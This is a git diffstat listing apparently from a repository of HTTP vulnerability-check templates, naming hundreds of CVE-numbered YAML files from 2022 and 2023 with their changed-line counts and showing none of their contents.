http/cves/2022/CVE-2022-0784.yaml | 2 +- http/cves/2022/CVE-2022-0785.yaml | 2 +- http/cves/2022/CVE-2022-0786.yaml | 2 +- http/cves/2022/CVE-2022-0788.yaml | 2 +- http/cves/2022/CVE-2022-0814.yaml | 2 +- http/cves/2022/CVE-2022-0817.yaml | 2 +- http/cves/2022/CVE-2022-0824.yaml | 2 +- http/cves/2022/CVE-2022-0826.yaml | 2 +- http/cves/2022/CVE-2022-0827.yaml | 2 +- http/cves/2022/CVE-2022-0846.yaml | 2 +- http/cves/2022/CVE-2022-0864.yaml | 2 +- http/cves/2022/CVE-2022-0867.yaml | 2 +- http/cves/2022/CVE-2022-0869.yaml | 2 +- http/cves/2022/CVE-2022-0870.yaml | 2 +- http/cves/2022/CVE-2022-0885.yaml | 2 +- http/cves/2022/CVE-2022-0899.yaml | 2 +- http/cves/2022/CVE-2022-0928.yaml | 2 +- http/cves/2022/CVE-2022-0948.yaml | 2 +- http/cves/2022/CVE-2022-0949.yaml | 4 ++-- http/cves/2022/CVE-2022-0952.yaml | 2 +- http/cves/2022/CVE-2022-0954.yaml | 2 +- http/cves/2022/CVE-2022-0963.yaml | 2 +- http/cves/2022/CVE-2022-0968.yaml | 2 +- http/cves/2022/CVE-2022-1007.yaml | 4 ++-- http/cves/2022/CVE-2022-1013.yaml | 4 ++-- http/cves/2022/CVE-2022-1020.yaml | 2 +- http/cves/2022/CVE-2022-1054.yaml | 2 +- http/cves/2022/CVE-2022-1057.yaml | 2 +- http/cves/2022/CVE-2022-1058.yaml | 2 +- http/cves/2022/CVE-2022-1119.yaml | 2 +- http/cves/2022/CVE-2022-1162.yaml | 2 +- http/cves/2022/CVE-2022-1168.yaml | 2 +- http/cves/2022/CVE-2022-1221.yaml | 2 +- http/cves/2022/CVE-2022-1386.yaml | 2 +- http/cves/2022/CVE-2022-1388.yaml | 4 ++-- http/cves/2022/CVE-2022-1391.yaml | 2 +- http/cves/2022/CVE-2022-1392.yaml | 2 +- http/cves/2022/CVE-2022-1398.yaml | 2 +- http/cves/2022/CVE-2022-1439.yaml | 2 +- http/cves/2022/CVE-2022-1442.yaml | 2 +- http/cves/2022/CVE-2022-1574.yaml | 2 +- http/cves/2022/CVE-2022-1595.yaml | 2 +- http/cves/2022/CVE-2022-1597.yaml | 2 +- http/cves/2022/CVE-2022-1598.yaml | 2 +- http/cves/2022/CVE-2022-1713.yaml | 2 +- http/cves/2022/CVE-2022-1724.yaml | 2 +- http/cves/2022/CVE-2022-1756.yaml | 2 +- http/cves/2022/CVE-2022-1768.yaml | 2 +- http/cves/2022/CVE-2022-1815.yaml | 2 +- http/cves/2022/CVE-2022-1883.yaml | 2 +- http/cves/2022/CVE-2022-1904.yaml | 2 +- http/cves/2022/CVE-2022-1906.yaml | 2 +- http/cves/2022/CVE-2022-1910.yaml | 2 +- http/cves/2022/CVE-2022-1916.yaml | 2 +- http/cves/2022/CVE-2022-1933.yaml | 2 +- http/cves/2022/CVE-2022-1937.yaml | 2 +- http/cves/2022/CVE-2022-1946.yaml | 2 +- http/cves/2022/CVE-2022-1952.yaml | 2 +- http/cves/2022/CVE-2022-2034.yaml | 2 +- http/cves/2022/CVE-2022-21371.yaml | 2 +- http/cves/2022/CVE-2022-21500.yaml | 2 +- http/cves/2022/CVE-2022-21705.yaml | 2 +- http/cves/2022/CVE-2022-2174.yaml | 2 +- http/cves/2022/CVE-2022-2185.yaml | 4 ++-- http/cves/2022/CVE-2022-2187.yaml | 2 +- http/cves/2022/CVE-2022-2219.yaml | 2 +- http/cves/2022/CVE-2022-22242.yaml | 2 +- http/cves/2022/CVE-2022-22536.yaml | 2 +- http/cves/2022/CVE-2022-22733.yaml | 2 +- http/cves/2022/CVE-2022-22897.yaml | 2 +- http/cves/2022/CVE-2022-2290.yaml | 2 +- http/cves/2022/CVE-2022-22947.yaml | 2 +- http/cves/2022/CVE-2022-22954.yaml | 4 ++-- http/cves/2022/CVE-2022-22963.yaml | 3 ++- http/cves/2022/CVE-2022-22965.yaml | 2 +- http/cves/2022/CVE-2022-22972.yaml | 2 +- http/cves/2022/CVE-2022-23102.yaml | 2 +- http/cves/2022/CVE-2022-23131.yaml | 2 +- http/cves/2022/CVE-2022-23134.yaml | 2 +- http/cves/2022/CVE-2022-2314.yaml | 2 +- http/cves/2022/CVE-2022-23178.yaml | 2 +- http/cves/2022/CVE-2022-23347.yaml | 2 +- http/cves/2022/CVE-2022-23348.yaml | 2 +- http/cves/2022/CVE-2022-23544.yaml | 5 +++-- http/cves/2022/CVE-2022-2373.yaml | 2 +- http/cves/2022/CVE-2022-2376.yaml | 2 +- http/cves/2022/CVE-2022-23779.yaml | 2 +- http/cves/2022/CVE-2022-2379.yaml | 2 +- http/cves/2022/CVE-2022-23808.yaml | 2 +- http/cves/2022/CVE-2022-2383.yaml | 2 +- http/cves/2022/CVE-2022-23854.yaml | 2 +- http/cves/2022/CVE-2022-23881.yaml | 2 +- http/cves/2022/CVE-2022-23898.yaml | 2 +- http/cves/2022/CVE-2022-23944.yaml | 2 +- http/cves/2022/CVE-2022-24124.yaml | 2 +- http/cves/2022/CVE-2022-24129.yaml | 2 +- http/cves/2022/CVE-2022-2414.yaml | 2 +- http/cves/2022/CVE-2022-24181.yaml | 2 +- http/cves/2022/CVE-2022-24223.yaml | 2 +- http/cves/2022/CVE-2022-24260.yaml | 2 +- http/cves/2022/CVE-2022-24264.yaml | 2 +- http/cves/2022/CVE-2022-24265.yaml | 2 +- http/cves/2022/CVE-2022-24266.yaml | 2 +- http/cves/2022/CVE-2022-24384.yaml | 2 +- http/cves/2022/CVE-2022-2462.yaml | 2 +- http/cves/2022/CVE-2022-2467.yaml | 2 +- http/cves/2022/CVE-2022-24681.yaml | 2 +- http/cves/2022/CVE-2022-24716.yaml | 2 +- http/cves/2022/CVE-2022-24816.yaml | 2 +- http/cves/2022/CVE-2022-24856.yaml | 2 +- http/cves/2022/CVE-2022-2487.yaml | 2 +- http/cves/2022/CVE-2022-2488.yaml | 2 +- http/cves/2022/CVE-2022-24899.yaml | 2 +- http/cves/2022/CVE-2022-24900.yaml | 2 +- http/cves/2022/CVE-2022-24990.yaml | 2 +- http/cves/2022/CVE-2022-25082.yaml | 2 +- http/cves/2022/CVE-2022-25125.yaml | 2 +- http/cves/2022/CVE-2022-25148.yaml | 2 +- http/cves/2022/CVE-2022-25149.yaml | 2 +- http/cves/2022/CVE-2022-25216.yaml | 2 +- http/cves/2022/CVE-2022-25323.yaml | 2 +- http/cves/2022/CVE-2022-2535.yaml | 2 +- http/cves/2022/CVE-2022-25356.yaml | 2 +- http/cves/2022/CVE-2022-2544.yaml | 2 +- http/cves/2022/CVE-2022-2546.yaml | 2 +- http/cves/2022/CVE-2022-25481.yaml | 2 +- http/cves/2022/CVE-2022-25485.yaml | 2 +- http/cves/2022/CVE-2022-25486.yaml | 2 +- http/cves/2022/CVE-2022-25487.yaml | 2 +- http/cves/2022/CVE-2022-25488.yaml | 2 +- http/cves/2022/CVE-2022-25489.yaml | 2 +- http/cves/2022/CVE-2022-25497.yaml | 2 +- http/cves/2022/CVE-2022-2551.yaml | 2 +- http/cves/2022/CVE-2022-25568.yaml | 2 +- http/cves/2022/CVE-2022-2599.yaml | 2 +- http/cves/2022/CVE-2022-26148.yaml | 2 +- http/cves/2022/CVE-2022-26159.yaml | 4 ++-- http/cves/2022/CVE-2022-26233.yaml | 2 +- http/cves/2022/CVE-2022-26263.yaml | 2 +- http/cves/2022/CVE-2022-2627.yaml | 2 +- http/cves/2022/CVE-2022-2633.yaml | 5 +++-- http/cves/2022/CVE-2022-26352.yaml | 2 +- http/cves/2022/CVE-2022-26564.yaml | 2 +- http/cves/2022/CVE-2022-26833.yaml | 2 +- http/cves/2022/CVE-2022-26960.yaml | 2 +- http/cves/2022/CVE-2022-2733.yaml | 2 +- http/cves/2022/CVE-2022-2756.yaml | 4 ++-- http/cves/2022/CVE-2022-27593.yaml | 2 +- http/cves/2022/CVE-2022-27849.yaml | 2 +- http/cves/2022/CVE-2022-27926.yaml | 2 +- http/cves/2022/CVE-2022-27927.yaml | 2 +- http/cves/2022/CVE-2022-27984.yaml | 2 +- http/cves/2022/CVE-2022-27985.yaml | 2 +- http/cves/2022/CVE-2022-28022.yaml | 2 +- http/cves/2022/CVE-2022-28023.yaml | 2 +- http/cves/2022/CVE-2022-28032.yaml | 2 +- http/cves/2022/CVE-2022-28079.yaml | 2 +- http/cves/2022/CVE-2022-28080.yaml | 2 +- http/cves/2022/CVE-2022-28117.yaml | 2 +- http/cves/2022/CVE-2022-28219.yaml | 2 +- http/cves/2022/CVE-2022-28290.yaml | 2 +- http/cves/2022/CVE-2022-28363.yaml | 2 +- http/cves/2022/CVE-2022-28365.yaml | 2 +- http/cves/2022/CVE-2022-2863.yaml | 2 +- http/cves/2022/CVE-2022-28923.yaml | 2 +- http/cves/2022/CVE-2022-28955.yaml | 2 +- http/cves/2022/CVE-2022-29004.yaml | 2 +- http/cves/2022/CVE-2022-29005.yaml | 2 +- http/cves/2022/CVE-2022-29014.yaml | 2 +- http/cves/2022/CVE-2022-29078.yaml | 2 +- http/cves/2022/CVE-2022-29153.yaml | 2 +- http/cves/2022/CVE-2022-29272.yaml | 2 +- http/cves/2022/CVE-2022-29298.yaml | 2 +- http/cves/2022/CVE-2022-29303.yaml | 2 +- http/cves/2022/CVE-2022-29349.yaml | 2 +- http/cves/2022/CVE-2022-29383.yaml | 2 +- http/cves/2022/CVE-2022-29455.yaml | 2 +- http/cves/2022/CVE-2022-29464.yaml | 2 +- http/cves/2022/CVE-2022-29548.yaml | 3 ++- http/cves/2022/CVE-2022-29775.yaml | 2 +- http/cves/2022/CVE-2022-30073.yaml | 2 +- http/cves/2022/CVE-2022-30489.yaml | 2 +- http/cves/2022/CVE-2022-30512.yaml | 2 +- http/cves/2022/CVE-2022-30513.yaml | 2 +- http/cves/2022/CVE-2022-30514.yaml | 2 +- http/cves/2022/CVE-2022-30525.yaml | 2 +- http/cves/2022/CVE-2022-3062.yaml | 2 +- http/cves/2022/CVE-2022-30776.yaml | 2 +- http/cves/2022/CVE-2022-30777.yaml | 2 +- http/cves/2022/CVE-2022-31268.yaml | 2 +- http/cves/2022/CVE-2022-31269.yaml | 2 +- http/cves/2022/CVE-2022-31299.yaml | 2 +- http/cves/2022/CVE-2022-31373.yaml | 2 +- http/cves/2022/CVE-2022-3142.yaml | 2 +- http/cves/2022/CVE-2022-31474.yaml | 2 +- http/cves/2022/CVE-2022-31499.yaml | 2 +- http/cves/2022/CVE-2022-31656.yaml | 2 +- http/cves/2022/CVE-2022-31798.yaml | 2 +- http/cves/2022/CVE-2022-31814.yaml | 4 ++-- http/cves/2022/CVE-2022-31845.yaml | 2 +- http/cves/2022/CVE-2022-31846.yaml | 2 +- http/cves/2022/CVE-2022-31847.yaml | 2 +- http/cves/2022/CVE-2022-31854.yaml | 2 +- http/cves/2022/CVE-2022-31879.yaml | 2 +- http/cves/2022/CVE-2022-31974.yaml | 2 +- http/cves/2022/CVE-2022-31975.yaml | 2 +- http/cves/2022/CVE-2022-31976.yaml | 2 +- http/cves/2022/CVE-2022-31977.yaml | 2 +- http/cves/2022/CVE-2022-31978.yaml | 2 +- http/cves/2022/CVE-2022-31980.yaml | 2 +- http/cves/2022/CVE-2022-31981.yaml | 2 +- http/cves/2022/CVE-2022-31982.yaml | 2 +- http/cves/2022/CVE-2022-31983.yaml | 2 +- http/cves/2022/CVE-2022-31984.yaml | 2 +- http/cves/2022/CVE-2022-32007.yaml | 2 +- http/cves/2022/CVE-2022-32015.yaml | 2 +- http/cves/2022/CVE-2022-32018.yaml | 2 +- http/cves/2022/CVE-2022-32022.yaml | 2 +- http/cves/2022/CVE-2022-32024.yaml | 2 +- http/cves/2022/CVE-2022-32025.yaml | 2 +- http/cves/2022/CVE-2022-32026.yaml | 2 +- http/cves/2022/CVE-2022-32028.yaml | 2 +- http/cves/2022/CVE-2022-32094.yaml | 2 +- http/cves/2022/CVE-2022-32195.yaml | 2 +- http/cves/2022/CVE-2022-32409.yaml | 2 +- http/cves/2022/CVE-2022-3242.yaml | 7 ++++--- http/cves/2022/CVE-2022-32429.yaml | 2 +- http/cves/2022/CVE-2022-32444.yaml | 2 +- http/cves/2022/CVE-2022-32770.yaml | 2 +- http/cves/2022/CVE-2022-33119.yaml | 2 +- http/cves/2022/CVE-2022-33174.yaml | 2 +- http/cves/2022/CVE-2022-33901.yaml | 2 +- http/cves/2022/CVE-2022-33965.yaml | 2 +- http/cves/2022/CVE-2022-34045.yaml | 2 +- http/cves/2022/CVE-2022-34046.yaml | 2 +- http/cves/2022/CVE-2022-34047.yaml | 2 +- http/cves/2022/CVE-2022-34048.yaml | 2 +- http/cves/2022/CVE-2022-34049.yaml | 2 +- http/cves/2022/CVE-2022-34093.yaml | 2 +- http/cves/2022/CVE-2022-34094.yaml | 2 +- http/cves/2022/CVE-2022-34121.yaml | 2 +- http/cves/2022/CVE-2022-34328.yaml | 2 +- http/cves/2022/CVE-2022-34576.yaml | 2 +- http/cves/2022/CVE-2022-34590.yaml | 2 +- http/cves/2022/CVE-2022-3484.yaml | 2 +- http/cves/2022/CVE-2022-3506.yaml | 2 +- http/cves/2022/CVE-2022-35151.yaml | 2 +- http/cves/2022/CVE-2022-35405.yaml | 2 +- http/cves/2022/CVE-2022-35413.yaml | 2 +- http/cves/2022/CVE-2022-35416.yaml | 2 +- http/cves/2022/CVE-2022-35493.yaml | 2 +- http/cves/2022/CVE-2022-3578.yaml | 2 +- http/cves/2022/CVE-2022-36537.yaml | 2 +- http/cves/2022/CVE-2022-36553.yaml | 2 +- http/cves/2022/CVE-2022-36642.yaml | 2 +- http/cves/2022/CVE-2022-36804.yaml | 2 +- http/cves/2022/CVE-2022-36883.yaml | 2 +- http/cves/2022/CVE-2022-37042.yaml | 2 +- http/cves/2022/CVE-2022-37153.yaml | 2 +- http/cves/2022/CVE-2022-37190.yaml | 2 +- http/cves/2022/CVE-2022-37191.yaml | 2 +- http/cves/2022/CVE-2022-37299.yaml | 2 +- http/cves/2022/CVE-2022-3768.yaml | 2 +- http/cves/2022/CVE-2022-3800.yaml | 2 +- http/cves/2022/CVE-2022-38295.yaml | 2 +- http/cves/2022/CVE-2022-38296.yaml | 2 +- http/cves/2022/CVE-2022-38463.yaml | 2 +- http/cves/2022/CVE-2022-38467.yaml | 2 +- http/cves/2022/CVE-2022-38553.yaml | 2 +- http/cves/2022/CVE-2022-38637.yaml | 2 +- http/cves/2022/CVE-2022-38794.yaml | 2 +- http/cves/2022/CVE-2022-38817.yaml | 2 +- http/cves/2022/CVE-2022-38870.yaml | 2 +- http/cves/2022/CVE-2022-39048.yaml | 2 +- http/cves/2022/CVE-2022-3908.yaml | 2 +- http/cves/2022/CVE-2022-39195.yaml | 2 +- http/cves/2022/CVE-2022-3933.yaml | 2 +- http/cves/2022/CVE-2022-3934.yaml | 2 +- http/cves/2022/CVE-2022-3980.yaml | 2 +- http/cves/2022/CVE-2022-3982.yaml | 2 +- http/cves/2022/CVE-2022-39952.yaml | 2 +- http/cves/2022/CVE-2022-39960.yaml | 2 +- http/cves/2022/CVE-2022-39986.yaml | 2 +- http/cves/2022/CVE-2022-40022.yaml | 2 +- http/cves/2022/CVE-2022-40032.yaml | 2 +- http/cves/2022/CVE-2022-40047.yaml | 2 +- http/cves/2022/CVE-2022-40083.yaml | 2 +- http/cves/2022/CVE-2022-40127.yaml | 2 +- http/cves/2022/CVE-2022-40359.yaml | 2 +- http/cves/2022/CVE-2022-4049.yaml | 2 +- http/cves/2022/CVE-2022-4050.yaml | 2 +- http/cves/2022/CVE-2022-4057.yaml | 2 +- http/cves/2022/CVE-2022-4059.yaml | 2 +- http/cves/2022/CVE-2022-4060.yaml | 2 +- http/cves/2022/CVE-2022-4063.yaml | 2 +- http/cves/2022/CVE-2022-40734.yaml | 2 +- http/cves/2022/CVE-2022-40843.yaml | 2 +- http/cves/2022/CVE-2022-40879.yaml | 2 +- http/cves/2022/CVE-2022-40881.yaml | 2 +- http/cves/2022/CVE-2022-4117.yaml | 2 +- http/cves/2022/CVE-2022-4140.yaml | 2 +- http/cves/2022/CVE-2022-41441.yaml | 2 +- http/cves/2022/CVE-2022-41473.yaml | 4 ++-- http/cves/2022/CVE-2022-41840.yaml | 2 +- http/cves/2022/CVE-2022-42094.yaml | 2 +- http/cves/2022/CVE-2022-42095.yaml | 2 +- http/cves/2022/CVE-2022-42096.yaml | 2 +- http/cves/2022/CVE-2022-42233.yaml | 2 +- http/cves/2022/CVE-2022-4260.yaml | 2 +- http/cves/2022/CVE-2022-42746.yaml | 2 +- http/cves/2022/CVE-2022-42747.yaml | 2 +- http/cves/2022/CVE-2022-42748.yaml | 2 +- http/cves/2022/CVE-2022-42749.yaml | 2 +- http/cves/2022/CVE-2022-4295.yaml | 2 +- http/cves/2022/CVE-2022-4301.yaml | 2 +- http/cves/2022/CVE-2022-43014.yaml | 2 +- http/cves/2022/CVE-2022-43015.yaml | 2 +- http/cves/2022/CVE-2022-43016.yaml | 2 +- http/cves/2022/CVE-2022-43017.yaml | 2 +- http/cves/2022/CVE-2022-43018.yaml | 2 +- http/cves/2022/CVE-2022-4305.yaml | 2 +- http/cves/2022/CVE-2022-4306.yaml | 2 +- http/cves/2022/CVE-2022-43140.yaml | 2 +- http/cves/2022/CVE-2022-43164.yaml | 2 +- http/cves/2022/CVE-2022-43165.yaml | 2 +- http/cves/2022/CVE-2022-43166.yaml | 2 +- http/cves/2022/CVE-2022-43167.yaml | 2 +- http/cves/2022/CVE-2022-43169.yaml | 2 +- http/cves/2022/CVE-2022-43170.yaml | 2 +- http/cves/2022/CVE-2022-43185.yaml | 2 +- http/cves/2022/CVE-2022-4320.yaml | 2 +- http/cves/2022/CVE-2022-4321.yaml | 2 +- http/cves/2022/CVE-2022-4325.yaml | 2 +- http/cves/2022/CVE-2022-4328.yaml | 2 +- http/cves/2022/CVE-2022-43769.yaml | 4 ++-- http/cves/2022/CVE-2022-44290.yaml | 4 ++-- http/cves/2022/CVE-2022-44291.yaml | 4 ++-- http/cves/2022/CVE-2022-4447.yaml | 2 +- http/cves/2022/CVE-2022-44944.yaml | 4 ++-- http/cves/2022/CVE-2022-44946.yaml | 4 ++-- http/cves/2022/CVE-2022-44947.yaml | 4 ++-- http/cves/2022/CVE-2022-44948.yaml | 4 ++-- http/cves/2022/CVE-2022-44949.yaml | 4 ++-- http/cves/2022/CVE-2022-44950.yaml | 4 ++-- http/cves/2022/CVE-2022-44951.yaml | 4 ++-- http/cves/2022/CVE-2022-44952.yaml | 4 ++-- http/cves/2022/CVE-2022-44957.yaml | 4 ++-- http/cves/2022/CVE-2022-45037.yaml | 2 +- http/cves/2022/CVE-2022-45038.yaml | 2 +- http/cves/2022/CVE-2022-45917.yaml | 2 +- http/cves/2022/CVE-2022-45933.yaml | 2 +- http/cves/2022/CVE-2022-46020.yaml | 2 +- http/cves/2022/CVE-2022-46071.yaml | 2 +- http/cves/2022/CVE-2022-46073.yaml | 2 +- http/cves/2022/CVE-2022-46169.yaml | 5 +++-- http/cves/2022/CVE-2022-46381.yaml | 2 +- http/cves/2022/CVE-2022-46443.yaml | 2 +- http/cves/2022/CVE-2022-46463.yaml | 2 +- http/cves/2022/CVE-2022-46888.yaml | 2 +- http/cves/2022/CVE-2022-46934.yaml | 2 +- http/cves/2022/CVE-2022-47002.yaml | 2 +- http/cves/2022/CVE-2022-47003.yaml | 2 +- http/cves/2022/CVE-2022-47075.yaml | 2 +- http/cves/2022/CVE-2022-47615.yaml | 2 +- http/cves/2022/CVE-2022-47945.yaml | 2 +- http/cves/2022/CVE-2022-47966.yaml | 4 ++-- http/cves/2022/CVE-2022-47986.yaml | 2 +- http/cves/2022/CVE-2022-48012.yaml | 2 +- http/cves/2022/CVE-2022-48165.yaml | 2 +- http/cves/2022/CVE-2022-48197.yaml | 2 +- http/cves/2022/CVE-2022-4897.yaml | 2 +- http/cves/2023/CVE-2023-0099.yaml | 2 +- http/cves/2023/CVE-2023-0126.yaml | 2 +- http/cves/2023/CVE-2023-0236.yaml | 2 +- http/cves/2023/CVE-2023-0261.yaml | 2 +- http/cves/2023/CVE-2023-0334.yaml | 2 +- http/cves/2023/CVE-2023-0448.yaml | 2 +- http/cves/2023/CVE-2023-0514.yaml | 2 +- http/cves/2023/CVE-2023-0527.yaml | 2 +- http/cves/2023/CVE-2023-0552.yaml | 2 +- http/cves/2023/CVE-2023-0562.yaml | 2 +- http/cves/2023/CVE-2023-0563.yaml | 2 +- http/cves/2023/CVE-2023-0600.yaml | 2 +- http/cves/2023/CVE-2023-0602.yaml | 2 +- http/cves/2023/CVE-2023-0669.yaml | 2 +- http/cves/2023/CVE-2023-0777.yaml | 2 +- http/cves/2023/CVE-2023-0900.yaml | 2 +- http/cves/2023/CVE-2023-0942.yaml | 2 +- http/cves/2023/CVE-2023-0947.yaml | 2 +- http/cves/2023/CVE-2023-0948.yaml | 2 +- http/cves/2023/CVE-2023-0968.yaml | 2 +- http/cves/2023/CVE-2023-1020.yaml | 2 +- http/cves/2023/CVE-2023-1080.yaml | 2 +- http/cves/2023/CVE-2023-1177.yaml | 4 ++-- http/cves/2023/CVE-2023-1263.yaml | 2 +- http/cves/2023/CVE-2023-1362.yaml | 2 +- http/cves/2023/CVE-2023-1408.yaml | 2 +- http/cves/2023/CVE-2023-1454.yaml | 2 +- http/cves/2023/CVE-2023-1496.yaml | 2 +- http/cves/2023/CVE-2023-1546.yaml | 2 +- http/cves/2023/CVE-2023-1671.yaml | 2 +- http/cves/2023/CVE-2023-1698.yaml | 2 +- http/cves/2023/CVE-2023-1730.yaml | 2 +- http/cves/2023/CVE-2023-1780.yaml | 2 +- http/cves/2023/CVE-2023-1835.yaml | 2 +- http/cves/2023/CVE-2023-1880.yaml | 2 +- http/cves/2023/CVE-2023-1890.yaml | 2 +- http/cves/2023/CVE-2023-20073.yaml | 2 +- http/cves/2023/CVE-2023-2009.yaml | 2 +- http/cves/2023/CVE-2023-20198.yaml | 2 +- http/cves/2023/CVE-2023-2023.yaml | 2 +- http/cves/2023/CVE-2023-20864.yaml | 2 +- http/cves/2023/CVE-2023-20887.yaml | 2 +- http/cves/2023/CVE-2023-20888.yaml | 2 +- http/cves/2023/CVE-2023-20889.yaml | 2 +- http/cves/2023/CVE-2023-2122.yaml | 2 +- http/cves/2023/CVE-2023-2130.yaml | 2 +- http/cves/2023/CVE-2023-2178.yaml | 2 +- http/cves/2023/CVE-2023-2224.yaml | 2 +- http/cves/2023/CVE-2023-22432.yaml | 4 ++-- http/cves/2023/CVE-2023-22463.yaml | 2 +- http/cves/2023/CVE-2023-22478.yaml | 2 +- http/cves/2023/CVE-2023-22480.yaml | 2 +- http/cves/2023/CVE-2023-22515.yaml | 2 +- http/cves/2023/CVE-2023-22518.yaml | 3 ++- http/cves/2023/CVE-2023-22620.yaml | 2 +- http/cves/2023/CVE-2023-2272.yaml | 2 +- http/cves/2023/CVE-2023-22897.yaml | 2 +- http/cves/2023/CVE-2023-23161.yaml | 2 +- http/cves/2023/CVE-2023-23333.yaml | 2 +- http/cves/2023/CVE-2023-23488.yaml | 2 +- http/cves/2023/CVE-2023-23491.yaml | 2 +- http/cves/2023/CVE-2023-23492.yaml | 2 +- http/cves/2023/CVE-2023-2356.yaml | 2 +- http/cves/2023/CVE-2023-23752.yaml | 2 +- http/cves/2023/CVE-2023-24044.yaml | 2 +- http/cves/2023/CVE-2023-24243.yaml | 2 +- http/cves/2023/CVE-2023-24278.yaml | 2 +- http/cves/2023/CVE-2023-24322.yaml | 2 +- http/cves/2023/CVE-2023-24488.yaml | 2 +- http/cves/2023/CVE-2023-24489.yaml | 2 +- http/cves/2023/CVE-2023-24657.yaml | 2 +- http/cves/2023/CVE-2023-24733.yaml | 2 +- http/cves/2023/CVE-2023-24735.yaml | 2 +- http/cves/2023/CVE-2023-24737.yaml | 2 +- http/cves/2023/CVE-2023-25135.yaml | 2 +- http/cves/2023/CVE-2023-25157.yaml | 2 +- http/cves/2023/CVE-2023-25346.yaml | 2 +- http/cves/2023/CVE-2023-25573.yaml | 2 +- http/cves/2023/CVE-2023-25717.yaml | 2 +- http/cves/2023/CVE-2023-26067.yaml | 2 +- http/cves/2023/CVE-2023-26255.yaml | 2 +- http/cves/2023/CVE-2023-26256.yaml | 2 +- http/cves/2023/CVE-2023-26360.yaml | 2 +- http/cves/2023/CVE-2023-2648.yaml | 2 +- http/cves/2023/CVE-2023-26842.yaml | 2 +- http/cves/2023/CVE-2023-26843.yaml | 2 +- http/cves/2023/CVE-2023-27008.yaml | 2 +- http/cves/2023/CVE-2023-27034.yaml | 2 +- http/cves/2023/CVE-2023-27159.yaml | 2 +- http/cves/2023/CVE-2023-27179.yaml | 2 +- http/cves/2023/CVE-2023-27292.yaml | 2 +- http/cves/2023/CVE-2023-2732.yaml | 2 +- http/cves/2023/CVE-2023-27372.yaml | 2 +- http/cves/2023/CVE-2023-27482.yaml | 2 +- http/cves/2023/CVE-2023-27524.yaml | 2 +- http/cves/2023/CVE-2023-27587.yaml | 2 +- http/cves/2023/CVE-2023-2766.yaml | 2 +- http/cves/2023/CVE-2023-2779.yaml | 2 +- http/cves/2023/CVE-2023-2780.yaml | 2 +- http/cves/2023/CVE-2023-27922.yaml | 4 ++-- http/cves/2023/CVE-2023-2796.yaml | 2 +- http/cves/2023/CVE-2023-28121.yaml | 2 +- http/cves/2023/CVE-2023-2813.yaml | 2 +- http/cves/2023/CVE-2023-2822.yaml | 2 +- http/cves/2023/CVE-2023-2825.yaml | 2 +- http/cves/2023/CVE-2023-28343.yaml | 2 +- http/cves/2023/CVE-2023-28432.yaml | 2 +- http/cves/2023/CVE-2023-28665.yaml | 2 +- http/cves/2023/CVE-2023-29298.yaml | 2 +- http/cves/2023/CVE-2023-29300.yaml | 2 +- http/cves/2023/CVE-2023-29357.yaml | 2 +- http/cves/2023/CVE-2023-29439.yaml | 2 +- http/cves/2023/CVE-2023-29489.yaml | 2 +- http/cves/2023/CVE-2023-29622.yaml | 2 +- http/cves/2023/CVE-2023-29623.yaml | 2 +- http/cves/2023/CVE-2023-2982.yaml | 2 +- http/cves/2023/CVE-2023-29887.yaml | 2 +- http/cves/2023/CVE-2023-29919.yaml | 2 +- http/cves/2023/CVE-2023-29922.yaml | 2 +- http/cves/2023/CVE-2023-29923.yaml | 2 +- http/cves/2023/CVE-2023-30013.yaml | 2 +- http/cves/2023/CVE-2023-30019.yaml | 2 +- http/cves/2023/CVE-2023-30150.yaml | 2 +- http/cves/2023/CVE-2023-30210.yaml | 2 +- http/cves/2023/CVE-2023-30212.yaml | 2 +- http/cves/2023/CVE-2023-30256.yaml | 2 +- http/cves/2023/CVE-2023-30625.yaml | 2 +- http/cves/2023/CVE-2023-30777.yaml | 2 +- http/cves/2023/CVE-2023-30868.yaml | 2 +- http/cves/2023/CVE-2023-30943.yaml | 2 +- http/cves/2023/CVE-2023-31059.yaml | 2 +- http/cves/2023/CVE-2023-31465.yaml | 2 +- http/cves/2023/CVE-2023-31548.yaml | 2 +- http/cves/2023/CVE-2023-3219.yaml | 2 +- http/cves/2023/CVE-2023-32235.yaml | 2 +- http/cves/2023/CVE-2023-32243.yaml | 2 +- http/cves/2023/CVE-2023-32563.yaml | 2 +- http/cves/2023/CVE-2023-33338.yaml | 2 +- http/cves/2023/CVE-2023-33405.yaml | 2 +- http/cves/2023/CVE-2023-33439.yaml | 2 +- http/cves/2023/CVE-2023-33440.yaml | 2 +- http/cves/2023/CVE-2023-3345.yaml | 2 +- http/cves/2023/CVE-2023-33510.yaml | 2 +- http/cves/2023/CVE-2023-33568.yaml | 2 +- http/cves/2023/CVE-2023-33584.yaml | 2 +- http/cves/2023/CVE-2023-33629.yaml | 16 ++++++++++++---- http/cves/2023/CVE-2023-33831.yaml | 2 +- http/cves/2023/CVE-2023-34124.yaml | 2 +- http/cves/2023/CVE-2023-34192.yaml | 2 +- http/cves/2023/CVE-2023-34259.yaml | 2 ++ http/cves/2023/CVE-2023-34362.yaml | 2 +- http/cves/2023/CVE-2023-34537.yaml | 2 +- http/cves/2023/CVE-2023-34598.yaml | 2 +- http/cves/2023/CVE-2023-34599.yaml | 2 +- http/cves/2023/CVE-2023-34659.yaml | 2 +- http/cves/2023/CVE-2023-34751.yaml | 2 +- http/cves/2023/CVE-2023-34752.yaml | 2 +- http/cves/2023/CVE-2023-34753.yaml | 2 +- http/cves/2023/CVE-2023-34755.yaml | 2 +- http/cves/2023/CVE-2023-34756.yaml | 2 +- http/cves/2023/CVE-2023-3479.yaml | 2 +- http/cves/2023/CVE-2023-34843.yaml | 2 +- http/cves/2023/CVE-2023-34960.yaml | 2 +- http/cves/2023/CVE-2023-35082.yaml | 2 +- http/cves/2023/CVE-2023-35813.yaml | 2 +- http/cves/2023/CVE-2023-35843.yaml | 2 +- http/cves/2023/CVE-2023-35844.yaml | 2 +- http/cves/2023/CVE-2023-35885.yaml | 2 +- http/cves/2023/CVE-2023-36287.yaml | 2 +- http/cves/2023/CVE-2023-36289.yaml | 2 +- http/cves/2023/CVE-2023-36306.yaml | 2 +- http/cves/2023/CVE-2023-36346.yaml | 2 +- http/cves/2023/CVE-2023-36844.yaml | 2 +- http/cves/2023/CVE-2023-36845.yaml | 2 +- http/cves/2023/CVE-2023-36934.yaml | 2 +- http/cves/2023/CVE-2023-3710.yaml | 7 ++++--- http/cves/2023/CVE-2023-37265.yaml | 2 +- http/cves/2023/CVE-2023-37266.yaml | 2 +- http/cves/2023/CVE-2023-37270.yaml | 2 +- http/cves/2023/CVE-2023-37462.yaml | 2 +- http/cves/2023/CVE-2023-37474.yaml | 2 +- 